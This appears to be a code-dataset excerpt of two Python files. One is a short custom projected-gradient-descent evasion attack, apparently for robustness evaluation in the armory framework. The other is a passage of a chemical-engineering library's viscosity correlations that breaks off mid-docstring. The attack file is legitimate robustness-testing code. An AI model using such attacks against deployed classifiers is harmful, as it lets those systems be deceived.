Python
| false
| false
| 1,460
|
py
|
patch_loss_gradient.py
|
from art.attacks.evasion import ProjectedGradientDescent
from patch_loss_gradient_model import get_art_model
import torch
from torch.autograd import Variable
from torchvision.transforms import RandomErasing
from armory.utils.evaluation import patch_method
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class CustomAttack(ProjectedGradientDescent):
def __init__(self, estimator, **kwargs):
# Create copy of the model (to avoid overwriting loss_gradient of original model)
new_estimator = get_art_model(model_kwargs={}, wrapper_kwargs={})
new_estimator.model.load_state_dict(estimator.model.state_dict())
# OR:
# import copy
# new_estimator = copy.deepcopy(estimator)
# Point attack to copy of model
super().__init__(new_estimator, **kwargs)
@patch_method(new_estimator)
def loss_gradient(
self, x: "torch.Tensor", y: "torch.Tensor", **kwargs
) -> "torch.Tensor":
x_var = Variable(x, requires_grad=True)
y_cat = torch.argmax(y)
transform = RandomErasing(p=1.0, scale=(0.5, 0.5))
x_mod = torch.stack([transform(x_var[0]) for i in range(100)], dim=0)
logits = self.model.net.forward(x_mod)
loss = self._loss(logits, y_cat.repeat(100))
self._model.zero_grad()
loss.backward()
grads = x_var.grad
return grads
|
9c9521ecdba651fbd3d0284893e45f8b208b3b93
|
9ca55981d3245d87d45debce8e9825b60db43046
|
/chemicals/viscosity.py
|
3a1f00bfb25da247eed17bfed0798893a06a9849
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
CalebBell/chemicals
|
c6b1ebd409c32e0e1053c4f97668a8ebcc92b969
|
37e32a7c7f819e0cb8e2a8784f8448f68b9a4215
|
refs/heads/master
| 2023-07-25T23:34:17.754310
| 2023-07-25T02:00:14
| 2023-07-25T02:00:14
| 264,697,738
| 137
| 33
|
MIT
| 2022-06-05T18:21:02
| 2020-05-17T15:27:11
|
Python
|
UTF-8
|
Python
| false
| false
| 100,177
|
py
|
viscosity.py
|
r"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017, 2018, 2019, 2020 Caleb Bell
<Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains various viscosity estimation routines, dataframes
of fit coefficients, and mixing rules.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/chemicals/>`_.
.. contents:: :local:
Pure Low Pressure Liquid Correlations
-------------------------------------
.. autofunction:: chemicals.viscosity.Letsou_Stiel
.. autofunction:: chemicals.viscosity.Przedziecki_Sridhar
Pure High Pressure Liquid Correlations
--------------------------------------
.. autofunction:: chemicals.viscosity.Lucas
Liquid Mixing Rules
-------------------
No specific correlations are implemented but
:obj:`chemicals.utils.mixing_logarithmic` with weight fractions is the
recommended form.
Pure Low Pressure Gas Correlations
----------------------------------
.. autofunction:: chemicals.viscosity.Yoon_Thodos
.. autofunction:: chemicals.viscosity.Stiel_Thodos
.. autofunction:: chemicals.viscosity.Lucas_gas
.. autofunction:: chemicals.viscosity.viscosity_gas_Gharagheizi
Pure High Pressure Gas Correlations
-----------------------------------
No correlations are implemented yet.
Gas Mixing Rules
----------------
.. autofunction:: chemicals.viscosity.Herning_Zipperer
.. autofunction:: chemicals.viscosity.Brokaw
.. autofunction:: chemicals.viscosity.Wilke
.. autofunction:: chemicals.viscosity.Wilke_prefactors
.. autofunction:: chemicals.viscosity.Wilke_prefactored
.. autofunction:: chemicals.viscosity.Wilke_large
Correlations for Specific Substances
------------------------------------
.. autofunction:: chemicals.viscosity.mu_IAPWS
.. autofunction:: chemicals.viscosity.mu_air_lemmon
Petroleum Correlations
----------------------
.. autofunction:: chemicals.viscosity.Twu_1985
.. autofunction:: chemicals.viscosity.Lorentz_Bray_Clarke
Fit Correlations
----------------
.. autofunction:: chemicals.viscosity.PPDS9
.. autofunction:: chemicals.viscosity.dPPDS9_dT
.. autofunction:: chemicals.viscosity.PPDS5
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_2
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_2_exponential
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_3
.. autofunction:: chemicals.viscosity.mu_Yaws
.. autofunction:: chemicals.viscosity.dmu_Yaws_dT
.. autofunction:: chemicals.viscosity.mu_Yaws_fitting_jacobian
.. autofunction:: chemicals.viscosity.mu_TDE
Conversion functions
--------------------
.. autofunction:: chemicals.viscosity.viscosity_converter
.. autofunction:: chemicals.viscosity.viscosity_index
Fit Coefficients
----------------
All of these coefficients are lazy-loaded, so they must be accessed as an
attribute of this module.
.. data:: mu_data_Dutt_Prasad
Coefficient sfor :obj:`chemicals.viscosity.Viswanath_Natarajan_3` from [1]_
for 100 fluids.
.. data:: mu_data_VN3
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_3` from [1]_
with data for 432 fluids.
.. data:: mu_data_VN2
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_2` from [1]_
with data for 135 fluids.
.. data:: mu_data_VN2E
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_2_exponential`
from [1]_ with data for 14 fluids.
.. data:: mu_data_Perrys_8E_2_313
A collection of 337 coefficient sets for :obj:`chemicals.dippr.EQ101` from the
DIPPR database published openly in [3]_.
.. data:: mu_data_Perrys_8E_2_312
A collection of 345 coefficient sets for :obj:`chemicals.dippr.EQ102` from the
DIPPR database published openly in [3]_.
.. data:: mu_data_VDI_PPDS_7
Coefficients for the model equation :obj:`PPDS9`, published openly in [2]_.
Provides no temperature limits, but has been designed
for extrapolation. Extrapolated to low temperatures it provides a
smooth exponential increase. However, for some chemicals such as
glycerol, extrapolated to higher temperatures viscosity is predicted
to increase above a certain point.
.. data:: mu_data_VDI_PPDS_8
Coefficients for a tempereture polynomial (T in Kelvin) developed by the
PPDS, published openly in [2]_. :math:`\mu = A + BT + CT^2 + DT^3 + ET^4`.
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
.. [2] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
.. [3] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
The structure of each dataframe is shown below:
.. ipython::
In [1]: import chemicals
In [2]: chemicals.viscosity.mu_data_Dutt_Prasad
In [3]: chemicals.viscosity.mu_data_VN3
In [4]: chemicals.viscosity.mu_data_VN2
In [5]: chemicals.viscosity.mu_data_VN2E
In [6]: chemicals.viscosity.mu_data_Perrys_8E_2_313
In [7]: chemicals.viscosity.mu_data_Perrys_8E_2_312
In [8]: chemicals.viscosity.mu_data_VDI_PPDS_7
In [9]: chemicals.viscosity.mu_data_VDI_PPDS_8
"""
__all__ = ['Viswanath_Natarajan_3','Letsou_Stiel', 'Przedziecki_Sridhar', 'PPDS9', 'dPPDS9_dT',
'Viswanath_Natarajan_2', 'Viswanath_Natarajan_2_exponential', 'Lucas', 'Brokaw',
'mu_TDE',
'Yoon_Thodos', 'Stiel_Thodos', 'Lucas_gas', 'viscosity_gas_Gharagheizi', 'Herning_Zipperer',
'Wilke', 'Wilke_prefactors', 'Wilke_prefactored', 'Wilke_large', 'mu_Yaws', 'dmu_Yaws_dT', 'mu_Yaws_fitting_jacobian',
'viscosity_index', 'viscosity_converter', 'Lorentz_Bray_Clarke', 'Twu_1985', 'mu_IAPWS', 'mu_air_lemmon',
'PPDS5']
from math import acos, atan, tan
from fluids.numerics import exp, interp, log, secant, sin, sqrt, trunc_exp
from fluids.numerics import numpy as np
from chemicals.data_reader import data_source, register_df_source
from chemicals.utils import PY37, can_load_data, mark_numba_incompatible, os_path_join, source_path
folder = os_path_join(source_path, 'Viscosity')
register_df_source(folder, 'Dutt Prasad 3 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'C': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 3 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'C': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 2 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 2 term Exponential.tsv', csv_kwargs={
'dtype':{'C': float, 'D': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Table 2-313 Viscosity of Inorganic and Organic Liquids.tsv')
register_df_source(folder, 'Table 2-312 Vapor Viscosity of Inorganic and Organic Substances.tsv', csv_kwargs={
'dtype':{'C1': float, 'C2': float, 'C3': float, 'C4': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'VDI PPDS Dynamic viscosity of saturated liquids polynomials.tsv', csv_kwargs={'float_precision': 'legacy'})
register_df_source(folder, 'VDI PPDS Dynamic viscosity of gases polynomials.tsv', csv_kwargs={'float_precision': 'legacy'})
_mu_data_loaded = False
@mark_numba_incompatible
def _load_mu_data():
global _mu_data_loaded, mu_data_Dutt_Prasad, mu_values_Dutt_Prasad
global mu_data_VN3, mu_values_VN3, mu_data_VN2, mu_values_VN2
global mu_data_VN2E, mu_values_VN2E, mu_data_Perrys_8E_2_313, mu_values_Perrys_8E_2_313
global mu_data_Perrys_8E_2_312, mu_values_Perrys_8E_2_312
global mu_data_VDI_PPDS_7, mu_values_PPDS_7, mu_data_VDI_PPDS_8, mu_values_PPDS_8
mu_data_Dutt_Prasad = data_source('Dutt Prasad 3 term.tsv')
mu_values_Dutt_Prasad = np.array(mu_data_Dutt_Prasad.values[:, 1:], dtype=float)
mu_data_VN3 = data_source('Viswanath Natarajan Dynamic 3 term.tsv')
mu_values_VN3 = np.array(mu_data_VN3.values[:, 2:], dtype=float)
mu_data_VN2 = data_source('Viswanath Natarajan Dynamic 2 term.tsv')
mu_values_VN2 = np.array(mu_data_VN2.values[:, 2:], dtype=float)
mu_data_VN2E = data_source('Viswanath Natarajan Dynamic 2 term Exponential.tsv')
mu_values_VN2E = np.array(mu_data_VN2E.values[:, 2:], dtype=float)
mu_data_Perrys_8E_2_313 = data_source('Table 2-313 Viscosity of Inorganic and Organic Liquids.tsv')
mu_values_Perrys_8E_2_313 = np.array(mu_data_Perrys_8E_2_313.values[:, 1:], dtype=float)
mu_data_Perrys_8E_2_312 = data_source('Table 2-312 Vapor Viscosity of Inorganic and Organic Substances.tsv')
mu_values_Perrys_8E_2_312 = np.array(mu_data_Perrys_8E_2_312.values[:, 1:], dtype=float)
mu_data_VDI_PPDS_7 = data_source('VDI PPDS Dynamic viscosity of saturated liquids polynomials.tsv')
mu_values_PPDS_7 = np.array(mu_data_VDI_PPDS_7.values[:, 2:], dtype=float)
mu_data_VDI_PPDS_8 = data_source('VDI PPDS Dynamic viscosity of gases polynomials.tsv')
mu_values_PPDS_8 = np.array(mu_data_VDI_PPDS_8.values[:, 1:], dtype=float)
_mu_data_loaded = True
if PY37:
def __getattr__(name):
if name in ('mu_data_Dutt_Prasad', 'mu_values_Dutt_Prasad', 'mu_data_VN3',
'mu_values_VN3', 'mu_data_VN2', 'mu_values_VN2', 'mu_data_VN2E',
'mu_values_VN2E', 'mu_data_Perrys_8E_2_313', 'mu_values_Perrys_8E_2_313',
'mu_data_Perrys_8E_2_312', 'mu_values_Perrys_8E_2_312', 'mu_data_VDI_PPDS_7',
'mu_values_PPDS_7', 'mu_data_VDI_PPDS_8', 'mu_values_PPDS_8'):
_load_mu_data()
return globals()[name]
raise AttributeError(f"module {__name__} has no attribute {name}")
else:
if can_load_data:
_load_mu_data()
def mu_IAPWS(T, rho, drho_dP=None, drho_dP_Tr=None):
r'''Calculates and returns the viscosity of water according to the IAPWS
(2008) release.
Viscosity is calculated as a function of three terms;
the first is the dilute-gas limit; the second is the contribution due to
finite density; and the third and most complex is a critical enhancement
term.
.. math::
\mu = \mu_0 \cdot \mu_1(T, \rho)
\cdot \mu_2(T, \rho)
.. math::
\mu_0(T) = \frac{100\sqrt{T}}{\sum_{i=0}^3 \frac{H_i}{T^i}}
.. math::
\mu_1(T, \rho) = \exp\left[\rho \sum_{i=0}^5
\left(\left(\frac{1}{T} - 1 \right)^i
\sum_{j=0}^6 H_{ij}(\rho - 1)^j\right)\right]
.. math::
\text{if }\xi < 0.3817016416 \text{ nm:}
.. math::
Y = 0.2 q_c \xi(q_D \xi)^5 \left(1 - q_c\xi + (q_c\xi)^2 -
\frac{765}{504}(q_D\xi)^2\right)
.. math::
\text{else:}
.. math::
Y = \frac{1}{12}\sin(3\psi_D) - \frac{1}{4q_c \xi}\sin(2\psi_D) +
\frac{1}{(q_c\xi)^2}\left[1 - 1.25(q_c\xi)^2\right]\sin(\psi_D)
- \frac{1}{(q_c\xi)^3}\left\{\left[1 - 1.5(q_c\xi)^2\right]\psi_D
- \left|(q_c\xi)^2 - 1\right|^{1.5}L(w)\right\}
.. math::
w = \left| \frac{q_c \xi -1}{q_c \xi +1}\right|^{0.5} \tan\left(
\frac{\psi_D}{2}\right)
.. math::
L(w) = \ln\frac{1 + w}{1 - w} \text{ if }q_c \xi > 1
.. math::
L(w) = 2\arctan|w| \text{ if }q_c \xi \le 1
.. math::
\psi_D = \arccos\left[\left(1 + q_D^2 \xi^2\right)^{-0.5}\right]
.. math::
\Delta \bar\chi(\bar T, \bar \rho) = \bar\rho\left[\zeta(\bar T, \bar
\rho) - \zeta(\bar T_R, \bar \rho)\frac{\bar T_R}{\bar T}\right]
.. math::
\xi = \xi_0 \left(\frac{\Delta \bar\chi}{\Gamma_0}\right)^{\nu/\gamma}
.. math::
\zeta = \left(\frac{\partial\bar\rho}{\partial \bar p}\right)_{\bar T}
Parameters
----------
T : float
Temperature of water [K]
rho : float
Density of water [kg/m^3]
drho_dP : float, optional
Partial derivative of density with respect to pressure at constant
temperature (at the temperature and density of water), [kg/m^3/Pa]
drho_dP_Tr : float, optional
Partial derivative of density with respect to pressure at constant
temperature (at the reference temperature (970.644 K) and the actual
density of water), [kg/m^3/Pa]
Returns
-------
mu : float
Viscosity, [Pa*s]
Notes
-----
There are three ways to use this formulation.
1) Compute the Industrial formulation value which does not include the
critical enhacement, by leaving `drho_dP` and `drho_dP_Tr` None.
2) Compute the Scientific formulation value by accurately computing and
providing `drho_dP` and `drho_dP_Tr`, both with IAPWS-95.
3) Get a non-standard but 8 decimal place matching result by providing
`drho_dP` computed with either IAPWS-95 or IAPWS-97, but not providing
`drho_dP_Tr`; which is calculated internally. There is a formulation
for that term in the thermal conductivity IAPWS equation which is used.
xmu = 0.068
qc = (1.9E-9)**-1
qd = (1.1E-9)**-1
nu = 0.630
gamma = 1.239
xi0 = 0.13E-9
Gamma0 = 0.06
TRC = 1.5
This forulation is highly optimized, spending most of its time in the
logarithm, power, and square root.
Examples
--------
>>> mu_IAPWS(298.15, 998.)
0.000889735100149808
>>> mu_IAPWS(1173.15, 400.)
6.415460784836147e-05
Point 4 of formulation, compared with MPEI and IAPWS, matches.
>>> mu_IAPWS(T=647.35, rho=322., drho_dP=1.213641949033E-2)
4.2961578738287e-05
Full scientific calculation:
>>> from chemicals.iapws import iapws95_properties, iapws95_P, iapws95_Tc
>>> T, P = 298.15, 1e5
>>> rho, _, _, _, _, _, _, _, _, _, drho_dP = iapws95_properties(T, P)
>>> P_ref = iapws95_P(1.5*iapws95_Tc, rho)
>>> _, _, _, _, _, _, _, _, _, _, drho_dP_Tr = iapws95_properties(1.5*iapws95_Tc, P_ref)
>>> mu_IAPWS(T, rho, drho_dP, drho_dP_Tr)
0.00089002267377
References
----------
.. [1] Huber, M. L., R. A. Perkins, A. Laesecke, D. G. Friend, J. V.
Sengers, M. J. Assael, I. N. Metaxa, E. Vogel, R. Mares, and
K. Miyagawa. "New International Formulation for the Viscosity of H2O."
Journal of Physical and Chemical Reference Data 38, no. 2
(June 1, 2009): 101-25. doi:10.1063/1.3088050.
'''
Tr = T*0.0015453657571674064 #/647.096
Tr_inv = 1.0/Tr
rhor = rho*0.003105590062111801 #1/322.
x0 = rhor - 1.
x1 = Tr_inv - 1.
# His = [1.67752, 2.20462, 0.6366564, -0.241605]
# mu0 = 0
# for i in range(4):
# mu0 += His[i]/Tr**i
mu0 = 100.0*sqrt(Tr)/(Tr_inv*(Tr_inv*(0.6366564 - 0.241605*Tr_inv) + 2.20462) + 1.67752)
# i_coefs = [0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 4, 4, 5, 6, 6]
# j_coef = [0, 1, 2, 3, 0, 1, 2, 3, 5, 0, 1, 2, 3, 4, 0, 1, 0, 3, 4, 3, 5]
# Hijs = [0.520094, .0850895, -1.08374, -0.289555, 0.222531, 0.999115,
# 1.88797, 1.26613, 0.120573, -0.281378, -0.906851, -0.772479,
# -0.489837, -0.257040, 0.161913, 0.257399, -0.0325372, 0.0698452,
# 0.00872102, -0.00435673, -0.000593264]
# tot = 0
# for i in range(21):
# tot += Hijs[i]*(rhor - 1.)**i_coefs[i]*(Tr_inv - 1.)**j_coef[i]
x02 = x0*x0
tot = (x0*(x0*(x0*(0.161913 - 0.0325372*x0) - 0.281378) + 0.222531)
+ x1*(x0*(x0*(0.257399*x0 - 0.906851) + 0.999115) + x1*(x0*(1.88797 - 0.772479*x0)
+ x1*(x0*(x0*(x02*(0.0698452 - 0.00435673*x02) - 0.489837) + 1.26613)
+ x1*(x02*(0.00872102*x0*x02 - 0.25704) + x0*x1*(0.120573 - 0.000593264*x02*x02*x0)) - 0.289555)
- 1.08374) + 0.0850895) + 0.520094)
mu1 = exp(rhor*tot)
if drho_dP is not None:
xmu = 0.068
qc = 526315789.4736842#(1.9E-9)**-1
qD = 909090909.0909091#(1.1E-9)**-1
# nu = 0.630
# gamma = 1.239
xi0 = 0.13E-9
# Gamma0 = 0.06
TRC = 1.5
# Not a perfect match because of
zeta_drho_dP = drho_dP*68521.73913043478 #22.064E6/322.0
if drho_dP_Tr is None:
# Brach needed to allow scientific points to work
if rhor <= 0.310559006:
tot1 = (rhor*(rhor*(rhor*(rhor*(1.97815050331519*rhor + 10.2631854662709) - 2.27492629730878)
+ 3.39624167361325) - 5.61149954923348) + 6.53786807199516)
elif rhor <= 0.776397516:
tot1 = (rhor*(rhor*(rhor*(rhor*(12.1358413791395 - 5.54349664571295*rhor) - 9.82240510197603)
+ 8.08379285492595) - 6.30816983387575) + 6.52717759281799)
elif rhor <= 1.242236025:
tot1 = (rhor*(rhor*(rhor*(rhor*(9.19494865194302 - 2.16866274479712*rhor) - 12.033872950579)
+ 8.91990208918795) - 3.96415689925446) + 5.35500529896124)
elif rhor <= 1.863354037:
tot1 = (rhor*(rhor*(rhor*(rhor*(6.1678099993336 - 0.965458722086812*rhor) - 11.0321960061126)
+ 8.93237374861479) + 0.464621290821181) + 1.55225959906681)
else:
tot1 = (rhor*(rhor*(rhor*(rhor*(4.66861294457414 - 0.503243546373828*rhor) - 10.325505114704)
+ 9.8895256507892) + 0.595748562571649) + 1.11999926419994)
drho_dP_Tr2 = 1./tot1
else:
drho_dP_Tr2 = drho_dP_Tr*68521.73913043478 #22.064E6/322.0
dchi = rhor*(zeta_drho_dP - drho_dP_Tr2*TRC*Tr_inv)
if dchi < 0.0:
# By definition
return mu0*mu1*1e-6
# 16.666 = 1/Gamma0
xi = xi0*(dchi*16.666666666666668)**0.5084745762711864 #(nu/gamma)
qD2 = qD*qD
xi2 = xi*xi
x2 = qD2*xi2
psiD = acos(1.0/sqrt(1.0 + x2))
qcxi = qc*xi
qcxi2 = qcxi*qcxi
qcxi_inv = 1.0/qcxi
w = sqrt(abs((qcxi - 1.0)/(qcxi + 1.0)))*tan(psiD*0.5)
if qc*xi > 1.0:
Lw = log((1.0 + w)/(1.0 - w))
else:
Lw = 2.0*atan(w)
if xi <= 0.381706416E-9:
# 1.5178571428571428 = 765./504
Y = 0.2*qcxi*x2*x2*qD*xi*(1.0 - qcxi + qcxi2 - 1.5178571428571428*x2)
else:
# sin(ax) = 2cos(ax/2)*sin(ax/2)
# It would be possible to compute the sin(2psiD) and sin(psiD) together with a sincos
# operation, but not the sin(3psid)
x3 = (abs(qcxi2 - 1.0))
Y = (1/12.*sin(3.0*psiD) + (-0.25*sin(2.0*psiD)
+((1.0 - 1.25*qcxi2)*sin(psiD)
-qcxi_inv*((1.0 - 1.5*qcxi2)*psiD - x3*sqrt(x3)*Lw))*qcxi_inv)*qcxi_inv )
mu2 = exp(xmu*Y)
else:
mu2 = 1.0
mu = mu0*mu1*mu2*1e-6
return mu
def mu_air_lemmon(T, rho):
r'''Calculates and returns the viscosity of air according to Lemmon
and Jacobsen (2003) [1]_.
Viscosity is calculated as a function of two terms;
the first is the dilute-gas limit; the second is the contribution due to
finite density.
.. math::
\mu = \mu^0(T) + \mu^r(T, \rho)
.. math::
\mu^0(T) = \frac{0.9266958\sqrt{MT}}{\sigma^2 \Omega(T^*)}
.. math::
\Omega(T^*) = \exp\left( \sum_{i=0}^4 b_i [\ln(T^*)]^i \right)
.. math::
\mu^r = \sum_{i=1}^n N_i \tau^{t_i} \delta^{d_i} \exp\left(
-\gamma_i \delta^{l_i}\right)
Parameters
----------
T : float
Temperature of air [K]
rho : float
Molar density of air [mol/m^3]
Returns
-------
mu : float
Viscosity of air, [Pa*s]
Notes
-----
The coefficients are:
Ni = [10.72, 1.122, 0.002019, -8.876, -0.02916]
ti = [0.2, 0.05, 2.4, 0.6, 3.6]
di = [1, 4, 9, 1, 8]
gammai = Ii = [0, 0, 0, 1, 1]
bi = [.431, -0.4623, 0.08406, 0.005341, -0.00331]
The reducing parameters are :math:`T_c = 132.6312` K and
:math:`\rho_c = 10447.7` mol/m^3. Additional parameters used are
:math:`\sigma = 0.36` nm,
:math:`M = 28.9586` g/mol and :math:`\frac{e}{k} = 103.3` K.
This is an implementation optimized for speed, spending its time
in the calclulation of 1 log; 2 exp; 1 power; and 2 divisions.
Examples
--------
Viscosity at 300 K and 1 bar:
>>> mu_air_lemmon(300.0, 40.10292351061862)
1.85371518556e-05
Calculate the density in-place:
>>> from chemicals.air import lemmon2000_rho
>>> mu_air_lemmon(300.0, lemmon2000_rho(300.0, 1e5))
1.85371518556e-05
References
----------
.. [1] Lemmon, E. W., and R. T. Jacobsen. "Viscosity and Thermal
Conductivity Equations for Nitrogen, Oxygen, Argon, and Air."
International Journal of Thermophysics 25, no. 1 (January 1, 2004):
21-69. https://doi.org/10.1023/B:IJOT.0000022327.04529.f3.
'''
# Cost: 1 log; 2 exp; 1 power; 2 divisions
# sigma = 0.360 # nm
# M = 28.9586 # g/mol
# rhoc = 10447.7 # mol/m^3, maxcondentherm actually
Tc = 132.6312 # K, maxcondentherm actually
tau = Tc/T
delta = rho*9.571484632981421e-05 # 9.57...E-5 = 1/10447.7
delta2 = delta*delta
delta4 = delta2*delta2
delta8 = delta4*delta4
tau_20 = tau**0.05
tau2_20 = tau_20*tau_20
tau4_20 = tau2_20*tau2_20
tau8_20 = tau4_20*tau4_20
tau12_20 = tau4_20*tau8_20
tau24_20 = tau12_20*tau12_20
tau48_20 = tau24_20*tau24_20
x0 = exp(-delta)
etar = (delta*(-8.876e-6*tau12_20*x0 + 0.002019e-6*tau48_20*delta8
+ 10.72e-6*tau4_20) + 1.122e-6*delta4*tau_20
- 0.02916e-6*delta8*tau24_20*x0*tau48_20)
# e_k = 103.3 # K
# Ts = T/e_k
Ts = T*0.00968054211035818 # 1/e_k
lnTs = log(Ts)
# tot = 0.0
# for i in range(5):
# tot += CIs[i]*lnTs**i
Omega = exp(lnTs*(lnTs*(lnTs*(0.005341 - 0.00331*lnTs) + 0.08406) - 0.4623) + 0.431)
# 0.0266958*sqrt(28.9586)/(0.360*0.360)*sqrt(132.6312) = 12.76...
eta0 = 12.765845058845755e-6/(Omega*tau8_20*tau2_20)
# eta0 = 0.0266958*sqrt(T*M)/(sigma*sigma*Omega)
# etar = 0.0
# for i in range(5):
# etar += Ni[i]*tau**ti[i]*delta**di[i]*exp(-gammai[i]*delta**Ii[i])
return (eta0 + etar)
def Viswanath_Natarajan_2(T, A, B):
r'''Calculate the viscosity of a liquid using the 2-term form
representation developed in [1]_. Requires input coefficients. The `A`
coefficient is assumed to yield coefficients in Pa*s; if it yields
values in 1E-3 Pa*s, remove log(100) for A.
.. math::
\mu = \exp\left(A + \frac{B}{T}\right)
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients than [1]_ has been found.
Examples
--------
DDBST has 0.0004580 as a value at this temperature for 1-Butanol.
>>> Viswanath_Natarajan_2(348.15, -5.9719-log(100), 1007.0)
0.000459836869568295
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return exp(A + B/T)
def Viswanath_Natarajan_2_exponential(T, C, D):
r'''Calculate the viscosity of a liquid using the 2-term exponential form
representation developed in [1]_. Requires input coefficients. The `A`
coefficient is assumed to yield coefficients in Pa*s, as all
coefficients found so far have been.
.. math::
\mu = C T^D
Parameters
----------
T : float
Temperature of fluid [K]
C : float
Linear coefficient, [Pa*s]
D : float
Exponential coefficient, [-]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
Examples
--------
>>> Ts = [283.15, 288.15, 303.15, 349.65]
>>> mus = [2.2173, 2.1530, 1.741, 1.0091] # in cP
>>> Viswanath_Natarajan_2_exponential(288.15, 4900800, -3.8075)
0.002114798866203873
Calculation of the AARD of the fit (1% is the value stated in [1]_.:
>>> mu_calc = [Viswanath_Natarajan_2_exponential(T, 4900800, -3.8075) for T in Ts]
>>> np.mean([abs((mu - mu_i*1000)/mu) for mu, mu_i in zip(mus, mu_calc)])
0.010467928813061298
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return C*T**D
def Viswanath_Natarajan_3(T, A, B, C):
r'''Calculate the viscosity of a liquid using the 3-term Antoine form
representation developed in [1]_. Requires input coefficients. If the
coefficients do not yield viscosity in Pa*s, but rather cP, remove
log10(1000) from `A`.
.. math::
\log_{10} \mu = A + B/(T + C)
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [K]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
Examples
--------
>>> from math import log10
>>> Viswanath_Natarajan_3(298.15, -2.7173-log10(1000), -1071.18, -129.51)
0.0006129806445142113
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return 10.0**(A + B/(C - T))
def mu_Yaws(T, A, B, C=0.0, D=0.0):
r'''Calculate the viscosity of a liquid using the 4-term Yaws polynomial
form. Requires input coefficients. If the
coefficients do not yield viscosity in Pa*s, but rather cP, remove
log10(1000) from `A`; this is required for the coefficients in [1]_.
.. math::
\log_{10} \mu = A + B/T + CT + DT^2
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
>>> from math import log10
>>> mu_Yaws(300.0, -6.4406-log10(1000), 1117.6, 0.0137, -0.000015465)
0.0010066612081
References
----------
.. [1] Yaws, Carl L. Thermophysical Properties of Chemicals and
Hydrocarbons, Second Edition. 2 edition. Amsterdam Boston: Gulf
Professional Publishing, 2014.
'''
exponent = (A + B/T + T*(C + D*T))
if exponent > 308.0:
return 1e308
return 10.0**exponent
def dmu_Yaws_dT(T, A, B, C=0.0, D=0.0):
r'''Calculate the temperature derivative of the viscosity of a liquid using
the 4-term Yaws polynomial form. Requires input coefficients.
.. math::
\frac{\partial \mu}{\partial T} = 10^{A + \frac{B}{T} + T \left(C
+ D T\right)} \left(- \frac{B}{T^{2}} + C + 2 D T\right)
\log{\left(10 \right)}
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
dmu_dT : float
First temperature derivative of liquid viscosity, [Pa*s/K]
Notes
-----
Examples
--------
>>> dmu_Yaws_dT(300.0, -9.4406, 1117.6, 0.0137, -0.000015465)
-1.853591586963e-05
'''
x0 = D*T
B_T = B/T
return 10.0**(A + B_T + T*(C + x0))*(-B_T/T + C + 2.0*x0)*2.302585092994046
def mu_Yaws_fitting_jacobian(Ts, A, B, C, D):
r'''Compute and return the Jacobian of the property predicted by
the Yaws viscosity equation with respect to all the coefficients. This is
used in fitting parameters for chemicals.
